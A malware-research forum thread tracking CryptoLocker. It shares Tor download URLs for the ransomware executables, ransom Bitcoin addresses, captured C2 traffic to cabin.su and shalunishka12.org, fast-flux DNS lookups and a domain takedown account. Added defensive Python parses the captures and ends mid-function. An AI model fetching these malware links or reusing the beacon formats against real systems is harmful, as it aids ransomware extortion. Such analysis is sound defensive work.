A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #22019  by Grinler
 Tue Jan 21, 2014 6:30 pm
tjcoder wrote: All reports say there have only been 3 since the oldest infections for CryptoLocker, and that some researchers have been tracing through the public Bitcoin data. I'm just one person and I can go to any of the public loggers and find where they cash out with 1-2 days' correlation. If I were the government I'd just subpoena or CA the data and know who they were. I doubt they are dumping into stolen accounts because it only delays the tracing and adds massive overhead; plus, they probably think Bitcoin is really anonymous.

Even if they did generate per machine and then relayed through other wallets on the back-end, the data is still public and easily traceable, even up to the current wallet holding the actual bitcoin. All reports seem to leave out what researchers find after they trace cash-outs. The C&C and propagation for this malware is entry-level; the RSA, AES and PPI do all the work.
They definitely do generate per machine. Very easy to do via the Bitcoin API:

./bitcoind getnewaddress

The above command issued on the C2 server will create a new address that will then be used by the newly infected computer.

The original 2 BTC addresses were:

https://blockchain.info/address/18iEz61 ... 7XCGDf5SVb
https://blockchain.info/address/1KP72fB ... qM6iMRspCh

If there was a third, I am not aware of it, but would like to add it to my CryptoLocker page.

I agree, though, Bitcoin is not anonymous and they may have been able to see the trail just by analyzing the transactions in the original static addresses and where the money was sent to. Monitoring those wallets further down the trail would then enable the paper trail. The problem is when they go through bitcoin tumblers (1CbR8da9YPZqXJJKm9ze1GYf67eKAUfXwP), which make it difficult to continue tracing. I am still learning the bitcoin world and am sure that certain agencies have a far greater grasp on it than I do.
 #22029  by Xylitol
 Wed Jan 22, 2014 3:13 pm
Cryptolocker
Code:
olgleyhvcxfi6kdn.onion/1002.exe
olgleyhvcxfi6kdn.onion/1003.exe
https://www.virustotal.com/en/file/8cf5 ... 390404314/ > 3/50
https://www.virustotal.com/en/file/5291 ... 390404390/ > 4/50

Network activity:
Code:
GET /I1QacGZADkNcZciF4niwN/Ki6AH9wkrs6syKWNrFRCaKBmKr3ZIhqEZIjEReQJUBladxcs8YtiYnGLqDGv3NpME3oIjGkCiVnllg3SG6LE8xbycrCbl+uSj7ADLs4n9lVzZIsbkXRumkNCrSgAvh/GOe3RtRqNVP5251++jnf+whyTTbUZPurQFnLCjb4kbdgljseGLryRtmSV98gjN9Uiw3pr3SHMMsWjeojPrCENej5e1LurAmJEmpFRBQFgMLxf4LmHLM74DaVTlQIZoyvuM/3gjLEHmAMhz9B3Ly6vEchu1/h11SC5N8TRQv5mM1XfUnkYhOXlyXVYwXIknEFQ== HTTP/1.1
Host: cabin.su

HTTP/1.1 200 OK
19f
<RSAKeyValue><Modulus>pi36n7v9TDwZgL8VnaVEkbxIil8USqxAzDmkNTPBXy/Rm2V+LLzQCvItoBa4akN3SOSPHU6q+Y2TXsxIDzyEIpnCax5PcosP3WAnVYwELdZFf8G60Zw2mMXbiOxvnOAtSEmfgHZWfafndjx/MIBm12fYXGdusksy9GtEAXP+VXm/eLr8yA+6DIwDAusaoGm/7kFQUDbaknFxsJaaqkPv6hQWHtJpt1FBNXnBukclxFxeBnAZ7AUVT9YRQhRhpu3iMwB6PF22WmOr7fRFh4JecVvAhkqSNwGh2mflatcYcl2UeMF8UN1UVz7A85T9Ghumpyzy+n000mIItDOBVyErfQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>
0

---

GET /wx5qE/21Y7qldH7PKwcujmlV9H3sZ80BS5xMr/vWJwYAx4OcKHEDfWE5Xdr+14xZVXBelALIlFMUU2PK2XueNskI/njUwjvfZtgCa/G12UA6TqHH5jrUv5MxCZiQgCcLthRTpWv4vzlCcjowQiUyL/e5+kNSu46T2ijGYRhqdz+jTSOWloRwsiqqfkC+ghSxc24e+uPX+68rOXbTnwfLpnQ7GLieXFfVkLQVo88uXuzHIAlSfuLdV+B7x6fsgc78kStBAxuv8uraaNHxz29eB/prv+ocYXHHLwtA0Gu+FSNVRVpI3RfajcYBVjpAaN3FlmEJongQVHRnWQxN7wZf9w== HTTP/1.1
Host: cabin.su

HTTP/1.1 200 OK
2f
431465+12pKs6JE8y4v29hCuEZNhXfgJucgoAuYtR+0.312
0
Code:
• dns: 14 ›› ip: 134.249.36.177 - address: CABIN.SU
-- addr: CABIN.SU -- ip: 91.190.179.50
-- addr: CABIN.SU -- ip: 92.248.152.248
-- addr: CABIN.SU -- ip: 194.28.61.91
-- addr: CABIN.SU -- ip: 109.104.185.78
-- addr: CABIN.SU -- ip: 185.33.143.175
-- addr: CABIN.SU -- ip: 31.135.60.153
-- addr: CABIN.SU -- ip: 46.150.66.35
-- addr: CABIN.SU -- ip: 188.235.218.206
-- addr: CABIN.SU -- ip: 31.192.62.247
-- addr: CABIN.SU -- ip: 109.162.27.67
-- addr: CABIN.SU -- ip: 178.137.181.98
-- addr: CABIN.SU -- ip: 188.190.207.152
-- addr: CABIN.SU -- ip: 46.0.139.8
-- addr: CABIN.SU -- ip: 134.249.36.177
Attachment: infected (335.54 KiB)
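The two responses above are worth pulling apart, because they are what a victim actually receives from the C2: a .NET-style RSAKeyValue public key (the private half never leaves the server, which is what makes the ransom model work), and a short record whose middle field has the shape of a Bitcoin address, which ties in with Grinler's point earlier in the thread that a fresh `getnewaddress` result is handed out per infection. The Python below is an added example, not code from the post or from any tool mentioned in the thread. It reassembles the chunked bodies (the `19f` and `2f` lines are hex chunk sizes), converts the key to PEM so `openssl rsa -pubin -text` can read it, computes a fingerprint for correlation, and base58check-validates the address. Reading the second response as id + address + amount is my interpretation; the post does not say what the fields are.

```python
"""Parse the cabin.su C2 responses captured above (added example)."""
import base64
import hashlib
import xml.etree.ElementTree as ET

# Constructed from the capture: both bodies are HTTP/1.1 chunked, i.e. a hex
# size line ("19f", "2f"), the data, then a terminating zero-size chunk.
RESP_KEY = (
    "19f\r\n"
    "<RSAKeyValue><Modulus>pi36n7v9TDwZgL8VnaVEkbxIil8USqxAzDmkNTPBXy/Rm2V+LLzQCvItoBa4akN3SOSPHU6q+Y2TXsxIDzyEIpnCax5PcosP3WAnVYwELdZFf8G60Zw2mMXbiOxvnOAtSEmfgHZWfafndjx/MIBm12fYXGdusksy9GtEAXP+VXm/eLr8yA+6DIwDAusaoGm/7kFQUDbaknFxsJaaqkPv6hQWHtJpt1FBNXnBukclxFxeBnAZ7AUVT9YRQhRhpu3iMwB6PF22WmOr7fRFh4JecVvAhkqSNwGh2mflatcYcl2UeMF8UN1UVz7A85T9Ghumpyzy+n000mIItDOBVyErfQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>\r\n"
    "0\r\n\r\n"
)
RESP_INFO = "2f\r\n431465+12pKs6JE8y4v29hCuEZNhXfgJucgoAuYtR+0.312\r\n0\r\n\r\n"

RSA_OID_DER = bytes.fromhex("06092a864886f70d010101")  # OID 1.2.840.113549.1.1.1
B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def dechunk(body: bytes) -> bytes:
    """Reassemble a chunked transfer body; refuse sizes that do not match."""
    out, pos = bytearray(), 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)  # drop chunk extensions
        pos = end + 2
        if size == 0:
            return bytes(out)
        chunk = body[pos:pos + size]
        if len(chunk) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk length does not match declared size")
        out += chunk
        pos += size + 2


def parse_rsakeyvalue(xml_text: str):
    """.NET RSAKeyValue XML -> (n, e); both fields are big-endian base64."""
    root = ET.fromstring(xml_text)
    n = int.from_bytes(base64.b64decode(root.findtext("Modulus")), "big")
    e = int.from_bytes(base64.b64decode(root.findtext("Exponent")), "big")
    return n, e


def _der(tag: int, body: bytes) -> bytes:
    """Minimal DER TLV: short form below 128 bytes, long form otherwise."""
    if len(body) < 0x80:
        return bytes([tag, len(body)]) + body
    length = len(body).to_bytes((len(body).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length)]) + length + body


def _der_int(x: int) -> bytes:
    b = x.to_bytes((x.bit_length() + 7) // 8, "big") or b"\x00"
    if b[0] & 0x80:  # keep the INTEGER positive
        b = b"\x00" + b
    return _der(0x02, b)


def to_pem(n: int, e: int) -> str:
    """SubjectPublicKeyInfo PEM, loadable by `openssl rsa -pubin -text`."""
    rsa_pub = _der(0x30, _der_int(n) + _der_int(e))
    alg = _der(0x30, RSA_OID_DER + b"\x05\x00")  # rsaEncryption, NULL params
    spki = _der(0x30, alg + _der(0x03, b"\x00" + rsa_pub))  # BIT STRING, 0 unused bits
    b64 = base64.b64encode(spki).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN PUBLIC KEY-----\n" + "\n".join(lines) + "\n-----END PUBLIC KEY-----\n"


def key_fingerprint(n: int, e: int) -> str:
    """SHA-256 over the DER SPKI, handy for correlating samples and captures."""
    der = base64.b64decode("".join(to_pem(n, e).splitlines()[1:-1]))
    return hashlib.sha256(der).hexdigest()


def is_valid_p2pkh(addr: str) -> bool:
    """Base58Check: version 0x00, 20-byte hash, 4-byte double-SHA256 checksum."""
    try:
        value = 0
        for c in addr:
            value = value * 58 + B58.index(c)  # ValueError on a non-base58 char
    except ValueError:
        return False
    raw = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    raw = b"\x00" * (len(addr) - len(addr.lstrip("1"))) + raw  # leading '1's are zero bytes
    if len(raw) != 25 or raw[0] != 0x00:
        return False
    return hashlib.sha256(hashlib.sha256(raw[:21]).digest()).digest()[:4] == raw[21:]


def parse_info(text: str) -> dict:
    """Second response: three '+'-separated fields. Treating them as
    id / Bitcoin address / amount is this example's reading, not the post's."""
    ident, addr, amount = text.split("+")
    return {"id": ident, "address": addr, "amount": amount,
            "address_checksum_ok": is_valid_p2pkh(addr)}


if __name__ == "__main__":
    key_xml = dechunk(RESP_KEY.encode()).decode()
    n, e = parse_rsakeyvalue(key_xml)
    print(f"RSA {n.bit_length()}-bit, e={e}, spki-sha256={key_fingerprint(n, e)}")
    print(to_pem(n, e))
    print(parse_info(dechunk(RESP_INFO.encode()).decode()))
```

The chunk sizes double as a transcription check: `0x19f` = 415 bytes is exactly the XML line, and `0x2f` = 47 bytes is the three fields plus their two separators. A 2048-bit key with e = 65537 per infection means there is nothing to factor or brute-force on the client side; the only recovery path is the server-side private key, so the operationally useful outputs are the fingerprint (to correlate samples and captures) and the PEM (to test whether a later key dump actually matches a given victim).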
 #22036  by unixfreaxjp
 Wed Jan 22, 2014 8:18 pm
Regarding Xylit0l's report at http://www.kernelmode.info/forum/viewto ... =90#p22029
I attached the PCAP I recorded as evidence.
Shared to help others research.

Additionally, people should pay more attention to the fast flux used; the moronz are riding on a botnet.
Thanks to Xylit0l for the info.

R01 (in the Russian Federation) is responsible for releasing (read: abused) the infector domain; use the data below for investigation, not the ARIN version:
http://www.r01.ru/domain/whois/check_we ... e=CABIN.SU
http://www.r01.ru/domain/whois/check-do ... n=CABIN.SU
Attachment: PCAP (14.62 KiB)
 #22042  by tx707
 Thu Jan 23, 2014 2:34 pm
dej13 wrote: Does the original sample of CryptoLocker (in OP) still work/infect?
Reinfected my virtual machine and I can say it doesn't work. Still persistent in Task Manager, but you can easily kill it with a .bat file.
 #22060  by unixfreaxjp
 Mon Jan 27, 2014 10:50 pm
In addition to the post at: http://www.kernelmode.info/forum/viewto ... =90#p22036
Supporting report posted at: http://www.kernelmode.info/forum/viewto ... =90#p22029

CABIN.SU (the reported CryptoLocker domain) is still on fast flux; see the result of the limited query below.
On my machine this bunch of 12 unique IP addresses came up within 5 seconds:
Code:
$ for i in 1 2 3 4 5; do dig +short cabin.su A; sleep 1; done
50.171.218.212
178.137.84.38
195.222.73.80
74.105.175.19
185.33.143.175
178.217.205.173
94.244.41.91
109.87.132.247
31.133.71.172
213.109.88.104
212.75.22.124
176.8.243.47
195.222.73.80
212.75.22.124
109.87.132.247
94.244.41.91
213.109.88.104
178.217.205.173
176.8.243.47
185.33.143.175
50.171.218.212
31.133.71.172
74.105.175.19
178.137.84.38
74.105.175.19
195.222.73.80
178.217.205.173
178.137.84.38
31.133.71.172
212.75.22.124
213.109.88.104
185.33.143.175
109.87.132.247
94.244.41.91
50.171.218.212
176.8.243.47
50.171.218.212
213.109.88.104
109.87.132.247
176.8.243.47
212.75.22.124
31.133.71.172
185.33.143.175
74.105.175.19
178.217.205.173
195.222.73.80
178.137.84.38
94.244.41.91
31.133.71.172
50.171.218.212
212.75.22.124
94.244.41.91
213.109.88.104
74.105.175.19
178.217.205.173
178.137.84.38
185.33.143.175
195.222.73.80
176.8.243.47
109.87.132.247
$
Just for information, the IP sources:
Code:
109.87.132.247|247.132.87.109.triolan.net.|13188 | 109.87.128.0/21 | BANKINFORM | UA | UKR.NET | TOV BANK-INFORM
176.8.243.47|176-8-243-47-chg.broadband.kyivstar.net.|15895 | 176.8.0.0/16 | KSNET | UA | KYIVSTAR.NET | KYIVSTAR PJSC
178.137.84.38|178-137-84-38-lvv.broadband.kyivstar.net.|15895 | 178.137.0.0/17 | KSNET | UA | KYIVSTAR.NET | KYIVSTAR PJSC
178.217.205.173||196767 | 178.217.205.0/24 | INMART1 | UA | INMART.NET.UA | INMART-INTERNET LTD
185.33.143.175|host175-143-33-185.lds.net.ua.|41709 | 185.33.140.0/22 | LDS | UA | LDS.NET.UA | LUGANSKY MEREZHY LTD
195.222.73.80|dynamic-vpdn-195-222-73-80.solo.by.|12358 | 195.222.64.0/20 | SOLO | BY | BELSONET.NET | SOLO LTD.
212.75.22.124|host-212-75-22-124.bbccable.net.|47982 | 212.75.0.0/19 | BBCCABLE | BG | BBCCABLE.NET | BBC CABLE LTD
213.109.88.104|s-213-109-88-104.under.net.ua.|41435 | 213.109.80.0/20 | UNDERNET | UA | UNDER.NET.UA | UNDERNET LTD.
31.133.71.172|pool-31-133-71-172.optima-east.net.|48882 | 31.133.64.0/20 | OPTIMA-SHID | UA | OPTIMA-EAST.NET | LLC OPTIMA-EAST
50.171.218.212|c-50-171-218-212.hsd1.mn.comcast.net.|7922 | 50.128.0.0/9 | COMCAST-7922 | US | COMCAST.NET | COMCAST CABLE COMMUNICATIONS HOLDINGS INC
74.105.175.19|pool-74-105-175-19.nwrknj.fios.verizon.net.|701 | 74.105.0.0/16 | UUNET | US | VERIZON.COM | VERIZON ONLINE LLC
94.244.41.91|ip-295b.proline.net.ua.|48278 | 94.244.0.0/18 | UKRDATACOM-NET | UA | RUSANOVKA-NET.KIEV.UA | UKRDATACOM LLC
As seen above, most are from Eastern Europe (Ukraine).
I worry about this case because these IPs are also used as Kelihos botnet IPs. Note: I am not suggesting ANY relation yet; it is too premature. It could be shared zombies. But as a quick PoC, this sample was received from one of the IPs above:
https://www.virustotal.com/en/file/7a5c ... /analysis/
as recorded in VT here:
https://www.virustotal.com/en/ip-addres ... formation/
and it is a Kelihos botnet trojan.

So let's get back to the usage of the domain CABIN.SU; the DNS query fluctuation of this domain can be a measure of infection hits for the reported CryptoLocker in particular.
I monitor it via Umbrella Labs (OpenDNS) and am receiving activity; for example, yesterday I saw the strong query volume recorded below:
(image: Umbrella Labs query graph)
Queries like the above still happen once in a while, from the first time Xyli detected this.
IMHO this is still an active threat, in the effort of infection/ransom; hard to say that it is massive, but it hits.

A dilemma has occurred. Since we're not here just to sit and watch, the request for suspension on the RU side was made 5 days ago (you all should have noticed this too), but it looks like no suspension has been executed. Below is evidence of the suspension request that followed:
(image: suspension request)
This is strange.. Are any researchers or LE investigating / collecting evidence on CABIN.SU now, which may be causing the suspension to be pending? No?
Since such a slow response is unlikely to happen otherwise... Feedback please.
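To turn the lookups and the whois table above into something that fits in a ticket, here is an added Python example (mine, not from the post or from any tool unixfreaxjp used) that takes repeated `dig +short` answer sets and the post's own pipe-separated whois lines and scores the name for fast flux: distinct IPs, distinct ASNs and countries, /16 spread, rotation between answers, and how many reverse names look like consumer/dynamic pools. The two answer sets are the first two of the five rounds from the post; the thresholds and the rDNS keyword list are my assumptions.

```python
"""Fast-flux triage over repeated A lookups of cabin.su (added example)."""
import ipaddress
from collections import Counter

# Constructed from the post: the first two of the five `dig +short` rounds
# (the same 12 records, rotated) and the whois lines in the post's own
# "ip|rdns|asn | prefix | as-name | cc | domain | org" layout.
ROUNDS = [
    ["50.171.218.212", "178.137.84.38", "195.222.73.80", "74.105.175.19",
     "185.33.143.175", "178.217.205.173", "94.244.41.91", "109.87.132.247",
     "31.133.71.172", "213.109.88.104", "212.75.22.124", "176.8.243.47"],
    ["195.222.73.80", "212.75.22.124", "109.87.132.247", "94.244.41.91",
     "213.109.88.104", "178.217.205.173", "176.8.243.47", "185.33.143.175",
     "50.171.218.212", "31.133.71.172", "74.105.175.19", "178.137.84.38"],
]
WHOIS = """\
109.87.132.247|247.132.87.109.triolan.net.|13188 | 109.87.128.0/21 | BANKINFORM | UA | UKR.NET | TOV BANK-INFORM
176.8.243.47|176-8-243-47-chg.broadband.kyivstar.net.|15895 | 176.8.0.0/16 | KSNET | UA | KYIVSTAR.NET | KYIVSTAR PJSC
178.137.84.38|178-137-84-38-lvv.broadband.kyivstar.net.|15895 | 178.137.0.0/17 | KSNET | UA | KYIVSTAR.NET | KYIVSTAR PJSC
178.217.205.173||196767 | 178.217.205.0/24 | INMART1 | UA | INMART.NET.UA | INMART-INTERNET LTD
185.33.143.175|host175-143-33-185.lds.net.ua.|41709 | 185.33.140.0/22 | LDS | UA | LDS.NET.UA | LUGANSKY MEREZHY LTD
195.222.73.80|dynamic-vpdn-195-222-73-80.solo.by.|12358 | 195.222.64.0/20 | SOLO | BY | BELSONET.NET | SOLO LTD.
212.75.22.124|host-212-75-22-124.bbccable.net.|47982 | 212.75.0.0/19 | BBCCABLE | BG | BBCCABLE.NET | BBC CABLE LTD
213.109.88.104|s-213-109-88-104.under.net.ua.|41435 | 213.109.80.0/20 | UNDERNET | UA | UNDER.NET.UA | UNDERNET LTD.
31.133.71.172|pool-31-133-71-172.optima-east.net.|48882 | 31.133.64.0/20 | OPTIMA-SHID | UA | OPTIMA-EAST.NET | LLC OPTIMA-EAST
50.171.218.212|c-50-171-218-212.hsd1.mn.comcast.net.|7922 | 50.128.0.0/9 | COMCAST-7922 | US | COMCAST.NET | COMCAST CABLE COMMUNICATIONS HOLDINGS INC
74.105.175.19|pool-74-105-175-19.nwrknj.fios.verizon.net.|701 | 74.105.0.0/16 | UUNET | US | VERIZON.COM | VERIZON ONLINE LLC
94.244.41.91|ip-295b.proline.net.ua.|48278 | 94.244.0.0/18 | UKRDATACOM-NET | UA | RUSANOVKA-NET.KIEV.UA | UKRDATACOM LLC
"""

# rDNS tokens typical of consumer/dynamic pools; a heuristic of this example.
DYNAMIC_RDNS_HINTS = ("pool", "dynamic", "broadband", "hsd1", "fios")


def parse_whois(text: str) -> dict:
    """'ip|rdns|asn | prefix | as-name | cc | domain | org' -> per-IP dict."""
    info = {}
    for line in text.strip().splitlines():
        f = [x.strip() for x in line.split("|")]
        info[f[0]] = {"rdns": f[1], "asn": int(f[2]), "prefix": f[3],
                      "cc": f[5], "org": f[7]}
    return info


def flux_report(rounds, whois, min_ips=5, min_asns=3) -> dict:
    """Answer-set diversity. The thresholds are this example's assumption: a
    legitimate round-robin or CDN does not spread one name over many
    unrelated consumer ASNs in several countries within a few seconds."""
    hits = Counter(ip for answers in rounds for ip in answers)
    uniq = set(hits)
    known = {ip: whois[ip] for ip in uniq if ip in whois}
    asns = {w["asn"] for w in known.values()}
    countries = {w["cc"] for w in known.values()}
    dynamic = sum(1 for w in known.values()
                  if any(h in w["rdns"].lower() for h in DYNAMIC_RDNS_HINTS))
    blocks16 = {str(ipaddress.ip_network(f"{ip}/16", strict=False)) for ip in uniq}
    return {
        "unique_ips": len(uniq),
        "asns": len(asns),
        "countries": len(countries),
        "slash16_blocks": len(blocks16),
        "dynamic_rdns": dynamic,
        "rotating": any(answers != rounds[0] for answers in rounds[1:]),
        "fast_flux": len(uniq) >= min_ips and len(asns) >= min_asns,
    }


def by_asn(whois: dict) -> dict:
    """Group the resolved IPs by (ASN, org, country) for the write-up."""
    groups = {}
    for ip, w in sorted(whois.items()):
        groups.setdefault((w["asn"], w["org"], w["cc"]), []).append(ip)
    return groups


if __name__ == "__main__":
    whois = parse_whois(WHOIS)
    for k, v in flux_report(ROUNDS, whois).items():
        print(f"{k:>15}: {v}")
    for (asn, org, cc), ips in by_asn(whois).items():
        print(f"AS{asn} {cc} {org}: {', '.join(ips)}")
```

On this data the name resolves to 12 addresses in 11 ASNs across 4 countries, with half of the reverse names looking like residential pools: the signature of a proxy layer running on infected hosts rather than a hosting provider's round-robin. For live use, collect the rounds with separate `dig` runs (and record the TTL, which `+short` hides) and feed the answers through your own ASN lookup instead of a pasted table.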
 #22067  by unixfreaxjp
 Tue Jan 28, 2014 3:53 pm
About cabin.su, additional info/updates:
We have repeatedly notified the registrar and are waiting for a response.
The registrar is ignoring their CERT's request (above is the message from the related CERT).
 #22086  by unixfreaxjp
 Thu Jan 30, 2014 7:28 am
Hi @Xylit0l, CABIN.SU is finally gone, *kaput* *vanished* *history* *dead* < according to CERT-IB an hour ago.
(image: message from CERT-IB)
So below is the last breath of this CL fast flux:
Code:
$ date
Thu Jan 30 16:28:22 JST 2014
$ for booboo in 1 2 3; do host -ta cabin.su; sleep 1;done
cabin.su has address 178.129.137.168
cabin.su has address 94.181.67.24
cabin.su has address 94.244.36.215
cabin.su has address 93.78.6.22
cabin.su has address 76.97.142.174
cabin.su has address 188.129.241.164
cabin.su has address 46.98.72.2
cabin.su has address 176.67.2.30
cabin.su has address 178.158.224.99
cabin.su has address 24.207.216.8
cabin.su has address 37.57.181.121
cabin.su has address 176.67.2.30
cabin.su has address 24.207.216.8
cabin.su has address 188.129.241.164
cabin.su has address 76.97.142.174
cabin.su has address 178.158.224.99
cabin.su has address 93.78.6.22
cabin.su has address 37.57.181.121
cabin.su has address 178.129.137.168
cabin.su has address 46.98.72.2
cabin.su has address 94.181.67.24
cabin.su has address 94.244.36.215
cabin.su has address 178.129.137.168
cabin.su has address 176.67.2.30
cabin.su has address 188.129.241.164
cabin.su has address 94.181.67.24
cabin.su has address 94.244.36.215
cabin.su has address 37.57.181.121
cabin.su has address 178.158.224.99
cabin.su has address 24.207.216.8
cabin.su has address 93.78.6.22
cabin.su has address 76.97.142.174
cabin.su has address 46.98.72.2
Don't rant at me for shutting down the nasty threat's internet domain, for whatever reason; they don't deserve to be there.
IMHO: we're too sweet to let those extortionist extremists practice CL for too long.

#MalwareMustDie
 #22175  by Xylitol
 Mon Feb 10, 2014 2:41 pm
CryptoLocker
https://www.virustotal.com/en/file/62f1 ... 392041823/
Code:
POST /e.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:26.0) Gecko/20100101 Firefox/26.0
Host: shalunishka12.org

data=AWUwY2Q0MGZjZWY0Mjc2NzcABgAAxcBjwH66faJOAiGdqXPJ1moo2tUdB4nkai/STwSHgJmMSGVtoU3eHa9JJi5kV2Xg9FXcN9Fz/smwcyJCvqp8EAfCpcRlT/30mCYXMWSMvM/5xhc6Bad7lvH3uJL3hZawnE71oIAGi8eBF6OT3dS2DSmgNxTaGIqB7hUsmAjNaQfh5wM1fEs5qDpV9DLhKAvSn1chrM6ntU3r50wFL+TCTrKQX6sAgMpZgtiJtEcaOGNieFPReFpBZNvGxJqLEZxXee21Wnm0YZyorv2sbolJGAiM3ySqlDvPJUxXQCcRRMTDDY3obJlzU1ajSk06WMVCZwJhQ25lvhsknpDX9pu8RCUGJ3D8BkAiq8aW45SxjMbVQPUB8biCjXv+tYdEprwvV1UUPn5Ybt+T1A7JpHreaOybi9ythkQhlsa0HBzqBhw2G6zWrveplD+VilIeKrZJRdlABV8vwW7qnt1IftNfBTVTqjB08tLaO+ZqgzJWNPhsaW69RasQ5wMz2EfFU2IzDlVJ718hWZVfFNEd1TqRRxbwI0iWTwl3DxUOhkz35dP0O/iZ8N4OmfvYVuKtVj5Hhl47uyH5/3gfA29Nq0P/xcuRO3LH490AE7Q/5fmp6sx9Sze2E0UbvRVZs/I5cWyT8u3po0TJgIeFoUYFB43i831mBk1pOa8I2+BSM296ybW1Sa7Ukuj74XXeZ6VGx484W9INd+mhlOOptJuQn0bd894+ZLJBbF0/SPTYq4QtytBLxXgblH1zYZX6pyET/tz79BAic+BGTenecgG5P/7f9IcRMfxXogqxLu2BgWg3I3V8vMd4/S6aGBTeF3wTFs94Y3NzpCbEEM1+lQPl8h52aGbug29Dmdw4B97tAvBXyqf804bKebBKHdhlU3SKCM7Xz2xl1d7fDcoYecWASP16NRrYjMookgKFTNB8aU54r3VyuEDne770WCGDXJ5bEkw3lQvjN0pPdsiWMhIG1XPHNi4ypQq3qJwrrdT/J1XJ0y1WXM7Z19d8BSQP/NK3J26BEHjPh/f/sgWbOZT8Lf8qKVxE55KXkhN3W15cSN0qty2XeFGvXvPlI40a3VAh38VEtPdze1qBNNUz7mJH13Qqfbe/CytJ/r1GHFrmizfxjyuJ6Ga/sToKDu0C5mbtI+CRgd1hzkv5y7Ofll72p+/DDGkil55Vlg9OiXknfAyQUXUskGOgAlcEvEs5LUmIuiEt8SkosXgwNsFe7N+g4ZOGy4z2GfU0xldf5vXynwmoJoFoHRVPowJA9IQ6C/Nm1277wczieEszB2IYV4xKnUIA3RyLp1/q0fdKqkDP72kfH5DQJbfujhqAd4izJA7GEOwzRRxO8lPPm631MGZgG2gt2LhCOTJLCVA0rEFn88Gz07wZtgcNInxlnO0hOoiV4zNj
HTTP/1.1 200 OK
---
GET /e.php?id=e0cd40fcef427677 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:26.0) Gecko/20100101 Firefox/26.0
Host: shalunishka12.org

HTTP/1.1 200 OK
---
POST /e.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:26.0) Gecko/20100101 Firefox/26.0
Host: shalunishka12.org

data=AmUwY2Q0MGZjZWY0Mjc2Nzdqampqampqampqampqampqampqam==
HTTP/1.1 200 OK
Attachment: infected (306.57 KiB)
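As an added example (not from the post), the Python below decodes the two POST bodies and the GET between them. Base64-decoding the first 24 characters of each `data=` blob shows the same layout in both: one type byte (0x01 in the first body, 0x02 in the second) followed by the 16-character identifier `e0cd40fcef427677`, which is exactly the `id=` the GET sends in between; the remainder of the second body is a run of 0x6A bytes. The field names, and the notion that byte 0 is a message type, are my reading of the two samples, not something the capture labels.

```python
"""Decode the shalunishka12.org /e.php beacons captured above (added example)."""
import base64
from urllib.parse import parse_qs, urlsplit

# Constructed from the capture: the two POST bodies (the base64 after "data=",
# the first one re-joined from its wrapped lines) and the GET request line.
POST_1 = (
    "AWUwY2Q0MGZjZWY0Mjc2NzcABgAAxcBjwH66faJOAiGdqXPJ1moo2tUdB4nkai/STwSHgJmMSGVtoU3eHa9JJi5kV2Xg9FXcN9Fz/smwcyJCvqp8EAfCpcRlT/30mCYXMWSMvM/5xhc6Bad7lvH3uJL3hZawnE71oIAGi8eBF6OT3dS2DSmgNxTaGIqB7hUsmAjNaQfh5wM1fEs5qDpV9DLhKAvSn1chrM6ntU3r50wFL+TCTrKQX6sAgMpZ"
    "gtiJtEcaOGNieFPReFpBZNvGxJqLEZxXee21Wnm0YZyorv2sbolJGAiM3ySqlDvPJUxXQCcRRMTDDY3obJlzU1ajSk06WMVCZwJhQ25lvhsknpDX9pu8RCUGJ3D8BkAiq8aW45SxjMbVQPUB8biCjXv+tYdEprwvV1UUPn5Ybt+T1A7JpHreaOybi9ythkQhlsa0HBzqBhw2G6zWrveplD+VilIeKrZJRdlABV8vwW7qnt1IftNfBTVTqjB0"
    "8tLaO+ZqgzJWNPhsaW69RasQ5wMz2EfFU2IzDlVJ718hWZVfFNEd1TqRRxbwI0iWTwl3DxUOhkz35dP0O/iZ8N4OmfvYVuKtVj5Hhl47uyH5/3gfA29Nq0P/xcuRO3LH490AE7Q/5fmp6sx9Sze2E0UbvRVZs/I5cWyT8u3po0TJgIeFoUYFB43i831mBk1pOa8I2+BSM296ybW1Sa7Ukuj74XXeZ6VGx484W9INd+mhlOOptJuQn0bd894+"
    "ZLJBbF0/SPTYq4QtytBLxXgblH1zYZX6pyET/tz79BAic+BGTenecgG5P/7f9IcRMfxXogqxLu2BgWg3I3V8vMd4/S6aGBTeF3wTFs94Y3NzpCbEEM1+lQPl8h52aGbug29Dmdw4B97tAvBXyqf804bKebBKHdhlU3SKCM7Xz2xl1d7fDcoYecWASP16NRrYjMookgKFTNB8aU54r3VyuEDne770WCGDXJ5bEkw3lQvjN0pPdsiWMhIG1XPH"
    "Ni4ypQq3qJwrrdT/J1XJ0y1WXM7Z19d8BSQP/NK3J26BEHjPh/f/sgWbOZT8Lf8qKVxE55KXkhN3W15cSN0qty2XeFGvXvPlI40a3VAh38VEtPdze1qBNNUz7mJH13Qqfbe/CytJ/r1GHFrmizfxjyuJ6Ga/sToKDu0C5mbtI+CRgd1hzkv5y7Ofll72p+/DDGkil55Vlg9OiXknfAyQUXUskGOgAlcEvEs5LUmIuiEt8SkosXgwNsFe7N+g"
    "4ZOGy4z2GfU0xldf5vXynwmoJoFoHRVPowJA9IQ6C/Nm1277wczieEszB2IYV4xKnUIA3RyLp1/q0fdKqkDP72kfH5DQJbfujhqAd4izJA7GEOwzRRxO8lPPm631MGZgG2gt2LhCOTJLCVA0rEFn88Gz07wZtgcNInxlnO0hOoiV4zNj"
)
GET_LINE = "GET /e.php?id=e0cd40fcef427677 HTTP/1.1"
POST_2 = "AmUwY2Q0MGZjZWY0Mjc2Nzdqampqampqampqampqampqam=="

HEADER_B64 = 24  # 24 base64 chars = 18 bytes: type byte, 16-char id, 1 payload byte


def decode_beacon(data_b64: str) -> dict:
    """Layout read off the two samples (an inference; the capture labels
    nothing): byte 0 = message type, bytes 1..16 = ASCII bot id, rest = payload."""
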